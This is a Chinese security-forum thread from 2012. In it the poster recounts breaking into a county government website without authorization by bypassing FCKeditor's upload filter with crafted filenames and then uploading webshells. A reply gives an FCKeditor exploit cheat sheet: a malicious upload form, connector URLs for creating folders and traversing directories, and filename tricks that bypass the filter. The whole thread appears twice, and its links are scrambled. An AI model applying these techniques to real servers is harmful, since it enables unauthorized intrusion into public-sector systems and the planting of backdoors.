[原创]另类fckeditor编辑器上传之对县政府站的友情检测-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[原创]另类fckeditor编辑器上传之对县政府站的友情检测

发表于: 2012-10-11 12:51 3818

[原创]另类fckeditor编辑器上传之对县政府站的友情检测

刘志军

2012-10-11 12:51

3818

闲的有点蛋疼，就友情了下政府站89cK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3N6G2N6W2)9J5k6h3y4F1i4@1g2r3i4@1u0o6i4K6S2o6i4@1f1%4i4K6W2o6i4K6S2n7i4@1f1@1i4@1t1^5i4K6S2n7i4@1f1%4i4@1p5^5i4K6S2n7i4@1f1#2i4@1u0m8i4K6S2r3j5i4y4H3P5q4!0q4y4#2)9&6b7g2)9^5y4q4!0q4c8W2!0n7b7#2)9^5b7#2!0q4z5q4!0n7y4g2!0n7y4W2!0q4y4#2!0n7y4q4!0m8y4#2!0q4y4W2)9&6x3g2)9^5y4W2!0q4y4g2)9^5y4#2!0n7b7g2!0q4y4#2!0m8y4g2)9&6c8g2!0q4y4g2)9&6z5g2!0m8z5q4!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4q4!0n7z5q4)9^5x3q4!0q4y4q4!0n7z5q4!0m8b7g2!0q4y4g2!0m8c8q4)9&6y4#2!0q4x3W2)9^5x3q4)9&6b7#2!0q4y4W2)9^5z5g2!0m8b7W2!0q4x3W2)9^5x3q4)9&6c8q4!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4q4!0n7z5q4)9^5x3q4!0q4z5g2!0m8x3g2!0n7c8W2!0q4y4#2)9^5b7W2)9^5x3W2!0q4y4W2)9^5z5g2!0m8b7W2!0q4c8W2!0n7b7#2)9^5b7#2!0q4z5g2)9&6z5g2!0m8y4q4!0q4y4q4!0n7b7g2)9^5y4W2!0q4y4q4!0n7z5q4!0m8b7g2!0q4y4g2)9&6x3q4)9^5c8g2!0q4y4g2)9^5c8W2!0n7x3q4!0q4c8W2!0n7b7#2)9^5b7#2!0q4y4W2!0n7x3W2!0m8x3g2!0q4y4g2)9&6y4g2!0m8y4g2!0q4y4W2)9&6y4q4!0n7y4W2!0q4z5q4)9^5c8g2!0n7y4#2!0q4x3#2)9^5x3q4)9^5x3R3`.`.

什么弱口令啊、注入啊。。。一个个试。。。老天跟我作对哇，进不去后台，难道是RP问题，NND。

放弃这个思路吧，看了下同服。

哇咔咔，还有个站，还是aspx，二话不说，继续开扫（没办法，离不开工具啊），这下RP爆发了，扫着一fckeditor编辑器编辑页面

打开

点下图片上传按钮跳出了上传页面，浏览——看到了目录。一片空白，没有前人来过啊。。。
果断的尝试直接上马，类型错误=失败，建了个asp目录才想起来是iis7.5的（蒙了），传了个图片测试，被重命名了。。。有点操蛋，跳到test.Html上传页面，发现aspx上传页面被干掉了，试了试asp的，还在传文件，传图片，各种传，NND，无果。。。

继续跳回文件浏览页，明知道IIS7.5解析漏洞木有，还是把一个马命名为1.asp;.jpg传了下，正常上传。但是有点操蛋，看图

文件扩展名后面没有了，留下个；号。记得以前没见过这样的啊。。。百度找了下，也没见有啊。。首先想到的是有洞，继续改文件名测试。。。。一次、两次、三次、。。。。看下面图。。。

基本都要在后面加个；号，测试了几十种配法。。各种替换各种来，最后有点接近了。。。看那个.;a的文件，稍微改了下，改成了 a.aspx.a;.a.aspx.jpg..jpg 终于出现了我想要的效果，就是上图最后那个aspx的文件，兴奋的打开，看见看我可爱的小马儿，哇咔咔。。。。直接上大马。
上了shell第一件事看组建，

可惜是台内网的，就没怎么想提权了。。。提下来也没什么用，LCX转发麻烦的很，也不缺服务器，就这样宣告检测结束。。。
总结：遇到没见过的情况要沉住气，耐心思考，成功与否可能就在一念之间。

[培训]科锐逆向工程师培训第53期2025年7月8日开班！

上传的附件：

图片1.png （170.00kb，176次下载）
图片2.png （2.65kb，170次下载）
图片3.png （25.09kb，172次下载）
图片4.png （65.24kb，173次下载）
图片5.png （3.49kb，170次下载）
图片6.jpg （45.58kb，173次下载）
图片7.png （9.21kb，172次下载）

收藏・5

免费・0

支持

最新回复 (9)
cyberarmy 雪币： 285 活跃值： (55) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 66 粉丝 0 关注私信	cyberarmy 2 楼楼主用的神马神器扫描的。。 2012-10-11 12:53 0
刘志军雪币： 26 活跃值： (56) 能力值： ( LV2，RANK：10 ) 在线值：发帖 32 回帖 149 粉丝 0 关注私信	刘志军 3 楼呵呵，比较常用的 WWWscan；只要字典强大就好 2012-10-11 12:57 0
刘志军雪币： 26 活跃值： (56) 能力值： ( LV2，RANK：10 ) 在线值：发帖 32 回帖 149 粉丝 0 关注私信	刘志军 4 楼 Fckeditor漏洞利用总结查看编辑器版本 FCKeditor/_whatsnew.html ————————————————————————————————————————————————————————————— 2. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破！测试通过。 ————————————————————————————————————————————————————————————— 3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制，导致用户上传任意文件！将以下保存为html文件，修改action地址。 <form id="frmUpload" enctype="multipart/form-data" action="http://611K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6r3b7@1E0W2k6r3W2@1L8%4u0Q4x3V1k6W2k6r3W2@1L8%4u0Q4x3V1k6X3K9h3I4W2L8h3q4F1j5h3N6W2M7W2)9J5c8Y4g2H3L8r3!0S2k6q4)9J5c8Y4m8Z5M7q4)9J5c8Y4g2H3L8r3!0S2k6q4)9J5k6i4m8Z5M7q4)9K6c8W2c8&6M7r3g2Q4x3@1c8y4k6h3c8A6j5b7`.`." method="post">Upload a new file:<br> <input type="file" name="NewFile" size="50"><br> <input id="btnUpload" type="submit" value="Upload"> </form> ————————————————————————————————————————————————————————————— 4.FCKeditor 文件上传“.”变“_”下划线的绕过方法很多时候上传的文件例如：shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。 4.1：提交shell.php+空格绕过不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件未测试。 4.2：继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹，只检测了第一级的目录，如果跳到二级目录就不受限制。 ————————————————————————————————————————————————————————————— 5. 突破建立文件夹 FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684 FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp ————————————————————————————————————————————————————————————— 6. FCKeditor 中test 文件的上传地址 FCKeditor/editor/filemanager/browser/default/connectors/test.html FCKeditor/editor/filemanager/upload/test.html FCKeditor/editor/filemanager/connectors/test.html FCKeditor/editor/filemanager/connectors/uploadtest.html ————————————————————————————————————————————————————————————— 7.常用上传地址 FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=72fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3U0f1J5c8X3k6U0K9$3g2V1K9i4c8G2M7W2)9J5y4e0u0r3k6h3c8A6N6r3!0J5i4K6t1#2x3V1k6X3K9h3I4W2L8h3q4F1j5h3N6W2M7W2)9J5y4e0u0r3j5$3!0F1L8X3g2U0N6r3!0J5M7#2)9J5y4e0u0r3M7r3S2H3i4K6t1#2x3V1k6U0L8$3&6F1k6h3y4@1L8%4u0Q4x3X3g2H3K9s2l9`. (ver:2.6.3 测试通过) JSP 版： FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp 注意红色部分修改为FCKeditor 实际使用的脚本语言，蓝色部分可以自定义文件夹名称也可以利用../..目录遍历，紫色部分为实际网站地址。 ————————————————————————————————————————————————————————————— 8.其他上传地址 FCKeditor/_samples/default.html FCKeditor/_samples/asp/sample01.asp FCKeditor/_samples/asp/sample02.asp FCKeditor/_samples/asp/sample03.asp FCKeditor/_samples/asp/sample04.asp 一般很多站点都已删除_samples 目录，可以试试。 FCKeditor/editor/fckeditor.html 不可以上传文件，可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。 ————————————————————————————————————————————————————————————— 9.列目录漏洞也可助找上传地址 Version 2.4.1 测试通过修改CurrentFolder 参数使用 ../../来进入不同的目录 /browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp 根据返回的XML 信息可以查看网站所有的目录。 FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F 也可以直接浏览盘符： JSP 版本： FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F ————————————————————————————————————————————————————————————— 10.爆路径漏洞 FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp ————————————————————————————————————————————————————————————— 11. FCKeditor 被动限制策略所导致的过滤不严问题影响版本: FCKeditor x.x <= FCKeditor v2.4.3 脆弱描述： FCKeditor v2.4.3 中File 类别默认拒绝上传类型： html\|htm\|php\|php2\|php3\|php4\|php5\|phtml\|pwml\|inc\|asp\|aspx\|ascx\|jsp\|cfm\|cfc\|pl\|bat\|exe\|com\|dll\|vbs\|js\|reg\|cgi\|htaccess\|asis\|sh\|shtml\|shtm\|phtm Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName，而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]! 而在apache 下，因为"Apache 文件名解析缺陷漏洞"也可以利用之，另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码，其限制最为狭隘。在上传时遇见可直接上传脚本文件固然很好，但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过，也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg! ————————————————————————————————————————————————————————————— 12.最古老的漏洞，Type文件没有限制！我接触到的第一个fckeditor漏洞了。版本不详，应该很古老了，因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹，一个新类型，没有任何限制，可以上传任意脚本！ ————————————————————————————————————————————————————————————— =============================================================================================================================================== FCK编辑器jsp版本漏洞： 61aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5c8X3k6U0K9$3g2V1K9i4c8G2M7W2)9J5c8X3g2V1K9i4c8G2M7W2)9J5c8X3k6A6L8r3g2E0j5h3&6S2k6$3g2J5i4K6u0r3j5Y4u0G2N6%4y4W2M7W2)9J5c8X3c8W2k6X3q4#2L8s2c8Q4x3V1k6U0L8$3&6F1k6h3y4@1L8%4u0K6i4K6u0r3K9Y4y4H3i4K6u0r3j5$3!0F1L8X3g2U0N6r3!0J5i4K6y4r3b7$3!0E0L8h3q4F1k6q4)9K6c8p5k6A6L8r3g2g2M7r3I4G2j5h3c8Q4x3U0k6f1P5i4m8W2i4K6y4p5d9h3#2S2k6$3g2Q4x3U0k6o6N6i4u0J5k6h3&6@1c8X3!0D9k6r3g2J5i4K6y4p5i4K6t1#2x3V1j5`. 上传马所在目录 FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ 上传shell的地址: ff0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5c8X3k6U0K9$3g2V1K9i4c8G2M7W2)9J5c8X3g2V1K9i4c8G2M7W2)9J5c8X3k6A6L8r3g2E0j5h3&6S2k6$3g2J5i4K6u0r3j5Y4u0G2N6%4y4W2M7W2)9J5c8X3c8W2k6X3q4#2L8s2c8Q4x3V1k6T1M7X3!0%4M7$3g2J5i4K6u0W2K9s2c8E0L8q4)9K6c8W2c8&6M7r3g2Q4x3@1c8u0L8h3q4Y4k6g2)9J5y4V1y4G2L8X3&6W2j5%4c8G2M7W2)9K6c8r3y4G2L8X3&6W2j5%4c8G2M7Y4y4Q4x3V1k6B7M7%4m8Q4x3V1k6U0L8$3&6F1k6h3y4@1L8%4t1`. 跟版本有关系.并不是百分百成功. 测试成功几个站. 不能通杀.很遗憾. e56K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5k6h3y4G2L8g2)9J5c8V1k6o6d9$3g2V1K9i4c8G2M7W2)9J5c8X3g2V1K9i4c8G2M7W2)9J5c8X3k6A6L8r3g2E0j5h3&6S2k6$3g2J5i4K6u0r3j5Y4u0G2N6%4y4W2M7W2)9J5c8X3c8W2k6X3q4#2L8s2c8Q4x3V1k6T1M7X3!0%4M7$3g2J5i4K6u0W2K9s2c8E0L8q4)9K6c8Y4c8&6M7r3g2Q4x3@1c8r3K9h3I4W2i4K6t1$3j5$3!0F1L8X3g2U0N6r3!0J5i4K6y4p5j5$3!0F1L8X3g2U0N6r3!0J5M7#2)9J5c8X3A6K6M7q4)9J5c8X3y4G2L8X3&6W2j5%4c8G2M7R3`.`. 如果以上地址不行可以试试 FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector FCKeditor/_samples/ FCKeditor/_samples/default.html FCKeditor/editor/fckeditor.htm FCKeditor/editor/fckdialog.html 解析漏洞+未重命名文件时上传漏洞 1.asp;jpg 2012-10-11 13:00 0
elianmeng 雪币： 967 活跃值： (1138) 能力值： ( LV6，RANK：90 ) 在线值：发帖 68 回帖 707 粉丝 4 关注私信	elianmeng 1 5 楼活得不赖烦了就直说啊明天就给关进去（以间谍的罪名给你弄进去永久监禁） 2012-10-11 14:19 0
刘志军雪币： 26 活跃值： (56) 能力值： ( LV2，RANK：10 ) 在线值：发帖 32 回帖 149 粉丝 0 关注私信	刘志军 6 楼呵呵，漏洞已经提交到乌云了，相信**是不会抓我的。 2012-10-11 15:25 0
dayang 雪币： 220 活跃值： (886) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 942 粉丝 1 关注私信	dayang 7 楼相信？你相信的是错误的，被洗脑的结果 2012-10-12 18:03 0
qvestx 雪币： 204 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	qvestx 8 楼这个也敢搞，nb~! 2012-10-16 17:09 0
seuer 雪币： 139 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 277 粉丝 0 关注私信	seuer 9 楼 wwwscan 我也用过，我怎么没扫描到什么漏洞。 2012-10-17 12:44 0
jackylee 雪币： 456 活跃值： (32) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 15 粉丝 0 关注私信	jackylee 10 楼楼主太不小心了 xadj 2012-10-17 14:07 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

刘志军

发帖

149

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (9)
cyberarmy 雪币： 285 活跃值： (55) 能力值： ( LV2，RANK：10 ) 在线值：发帖 14 回帖 66 粉丝 0 关注私信	cyberarmy 2 楼楼主用的神马神器扫描的。。 2012-10-11 12:53 0
刘志军雪币： 26 活跃值： (56) 能力值： ( LV2，RANK：10 ) 在线值：发帖 32 回帖 149 粉丝 0 关注私信	刘志军 3 楼呵呵，比较常用的 WWWscan；只要字典强大就好 2012-10-11 12:57 0
刘志军雪币： 26 活跃值： (56) 能力值： ( LV2，RANK：10 ) 在线值：发帖 32 回帖 149 粉丝 0 关注私信	刘志军 4 楼 Fckeditor漏洞利用总结查看编辑器版本 FCKeditor/_whatsnew.html ————————————————————————————————————————————————————————————— 2. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破！测试通过。 ————————————————————————————————————————————————————————————— 3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制，导致用户上传任意文件！将以下保存为html文件，修改action地址。 <form id="frmUpload" enctype="multipart/form-data" action="http://611K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3V1k6r3b7@1E0W2k6r3W2@1L8%4u0Q4x3V1k6W2k6r3W2@1L8%4u0Q4x3V1k6X3K9h3I4W2L8h3q4F1j5h3N6W2M7W2)9J5c8Y4g2H3L8r3!0S2k6q4)9J5c8Y4m8Z5M7q4)9J5c8Y4g2H3L8r3!0S2k6q4)9J5k6i4m8Z5M7q4)9K6c8W2c8&6M7r3g2Q4x3@1c8y4k6h3c8A6j5b7`.`." method="post">Upload a new file:<br> <input type="file" name="NewFile" size="50"><br> <input id="btnUpload" type="submit" value="Upload"> </form> ————————————————————————————————————————————————————————————— 4.FCKeditor 文件上传“.”变“_”下划线的绕过方法很多时候上传的文件例如：shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。 4.1：提交shell.php+空格绕过不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件未测试。 4.2：继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹，只检测了第一级的目录，如果跳到二级目录就不受限制。 ————————————————————————————————————————————————————————————— 5. 突破建立文件夹 FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684 FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp ————————————————————————————————————————————————————————————— 6. FCKeditor 中test 文件的上传地址 FCKeditor/editor/filemanager/browser/default/connectors/test.html FCKeditor/editor/filemanager/upload/test.html FCKeditor/editor/filemanager/connectors/test.html FCKeditor/editor/filemanager/connectors/uploadtest.html ————————————————————————————————————————————————————————————— 7.常用上传地址 FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=72fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4A6N6r3g2Q4x3X3g2U0L8$3#2Q4x3U0f1J5c8X3k6U0K9$3g2V1K9i4c8G2M7W2)9J5y4e0u0r3k6h3c8A6N6r3!0J5i4K6t1#2x3V1k6X3K9h3I4W2L8h3q4F1j5h3N6W2M7W2)9J5y4e0u0r3j5$3!0F1L8X3g2U0N6r3!0J5M7#2)9J5y4e0u0r3M7r3S2H3i4K6t1#2x3V1k6U0L8$3&6F1k6h3y4@1L8%4u0Q4x3X3g2H3K9s2l9`. (ver:2.6.3 测试通过) JSP 版： FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp 注意红色部分修改为FCKeditor 实际使用的脚本语言，蓝色部分可以自定义文件夹名称也可以利用../..目录遍历，紫色部分为实际网站地址。 ————————————————————————————————————————————————————————————— 8.其他上传地址 FCKeditor/_samples/default.html FCKeditor/_samples/asp/sample01.asp FCKeditor/_samples/asp/sample02.asp FCKeditor/_samples/asp/sample03.asp FCKeditor/_samples/asp/sample04.asp 一般很多站点都已删除_samples 目录，可以试试。 FCKeditor/editor/fckeditor.html 不可以上传文件，可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。 ————————————————————————————————————————————————————————————— 9.列目录漏洞也可助找上传地址 Version 2.4.1 测试通过修改CurrentFolder 参数使用 ../../来进入不同的目录 /browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp 根据返回的XML 信息可以查看网站所有的目录。 FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F 也可以直接浏览盘符： JSP 版本： FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F ————————————————————————————————————————————————————————————— 10.爆路径漏洞 FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp ————————————————————————————————————————————————————————————— 11. FCKeditor 被动限制策略所导致的过滤不严问题影响版本: FCKeditor x.x <= FCKeditor v2.4.3 脆弱描述： FCKeditor v2.4.3 中File 类别默认拒绝上传类型： html\|htm\|php\|php2\|php3\|php4\|php5\|phtml\|pwml\|inc\|asp\|aspx\|ascx\|jsp\|cfm\|cfc\|pl\|bat\|exe\|com\|dll\|vbs\|js\|reg\|cgi\|htaccess\|asis\|sh\|shtml\|shtm\|phtm Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName，而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]! 而在apache 下，因为"Apache 文件名解析缺陷漏洞"也可以利用之，另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码，其限制最为狭隘。在上传时遇见可直接上传脚本文件固然很好，但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过，也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg! ————————————————————————————————————————————————————————————— 12.最古老的漏洞，Type文件没有限制！我接触到的第一个fckeditor漏洞了。版本不详，应该很古老了，因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹，一个新类型，没有任何限制，可以上传任意脚本！ ————————————————————————————————————————————————————————————— =============================================================================================================================================== FCK编辑器jsp版本漏洞： 61aK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5c8X3k6U0K9$3g2V1K9i4c8G2M7W2)9J5c8X3g2V1K9i4c8G2M7W2)9J5c8X3k6A6L8r3g2E0j5h3&6S2k6$3g2J5i4K6u0r3j5Y4u0G2N6%4y4W2M7W2)9J5c8X3c8W2k6X3q4#2L8s2c8Q4x3V1k6U0L8$3&6F1k6h3y4@1L8%4u0K6i4K6u0r3K9Y4y4H3i4K6u0r3j5$3!0F1L8X3g2U0N6r3!0J5i4K6y4r3b7$3!0E0L8h3q4F1k6q4)9K6c8p5k6A6L8r3g2g2M7r3I4G2j5h3c8Q4x3U0k6f1P5i4m8W2i4K6y4p5d9h3#2S2k6$3g2Q4x3U0k6o6N6i4u0J5k6h3&6@1c8X3!0D9k6r3g2J5i4K6y4p5i4K6t1#2x3V1j5`. 上传马所在目录 FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/ 上传shell的地址: ff0K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4S2^5P5q4)9J5k6h3y4G2L8g2)9J5c8X3k6U0K9$3g2V1K9i4c8G2M7W2)9J5c8X3g2V1K9i4c8G2M7W2)9J5c8X3k6A6L8r3g2E0j5h3&6S2k6$3g2J5i4K6u0r3j5Y4u0G2N6%4y4W2M7W2)9J5c8X3c8W2k6X3q4#2L8s2c8Q4x3V1k6T1M7X3!0%4M7$3g2J5i4K6u0W2K9s2c8E0L8q4)9K6c8W2c8&6M7r3g2Q4x3@1c8u0L8h3q4Y4k6g2)9J5y4V1y4G2L8X3&6W2j5%4c8G2M7W2)9K6c8r3y4G2L8X3&6W2j5%4c8G2M7Y4y4Q4x3V1k6B7M7%4m8Q4x3V1k6U0L8$3&6F1k6h3y4@1L8%4t1`. 跟版本有关系.并不是百分百成功. 测试成功几个站. 不能通杀.很遗憾. e56K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5b7g2)9J5k6h3y4G2L8g2)9J5c8V1k6o6d9$3g2V1K9i4c8G2M7W2)9J5c8X3g2V1K9i4c8G2M7W2)9J5c8X3k6A6L8r3g2E0j5h3&6S2k6$3g2J5i4K6u0r3j5Y4u0G2N6%4y4W2M7W2)9J5c8X3c8W2k6X3q4#2L8s2c8Q4x3V1k6T1M7X3!0%4M7$3g2J5i4K6u0W2K9s2c8E0L8q4)9K6c8Y4c8&6M7r3g2Q4x3@1c8r3K9h3I4W2i4K6t1$3j5$3!0F1L8X3g2U0N6r3!0J5i4K6y4p5j5$3!0F1L8X3g2U0N6r3!0J5M7#2)9J5c8X3A6K6M7q4)9J5c8X3y4G2L8X3&6W2j5%4c8G2M7R3`.`. 如果以上地址不行可以试试 FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector FCKeditor/_samples/ FCKeditor/_samples/default.html FCKeditor/editor/fckeditor.htm FCKeditor/editor/fckdialog.html 解析漏洞+未重命名文件时上传漏洞 1.asp;jpg 2012-10-11 13:00 0
elianmeng 雪币： 967 活跃值： (1138) 能力值： ( LV6，RANK：90 ) 在线值：发帖 68 回帖 707 粉丝 4 关注私信	elianmeng 1 5 楼活得不赖烦了就直说啊明天就给关进去（以间谍的罪名给你弄进去永久监禁） 2012-10-11 14:19 0
刘志军雪币： 26 活跃值： (56) 能力值： ( LV2，RANK：10 ) 在线值：发帖 32 回帖 149 粉丝 0 关注私信	刘志军 6 楼呵呵，漏洞已经提交到乌云了，相信**是不会抓我的。 2012-10-11 15:25 0
dayang 雪币： 220 活跃值： (886) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 942 粉丝 1 关注私信	dayang 7 楼相信？你相信的是错误的，被洗脑的结果 2012-10-12 18:03 0
qvestx 雪币： 204 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 1 粉丝 0 关注私信	qvestx 8 楼这个也敢搞，nb~! 2012-10-16 17:09 0
seuer 雪币： 139 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 13 回帖 277 粉丝 0 关注私信	seuer 9 楼 wwwscan 我也用过，我怎么没扫描到什么漏洞。 2012-10-17 12:44 0
jackylee 雪币： 456 活跃值： (32) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 15 粉丝 0 关注私信	jackylee 10 楼楼主太不小心了 xadj 2012-10-17 14:07 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复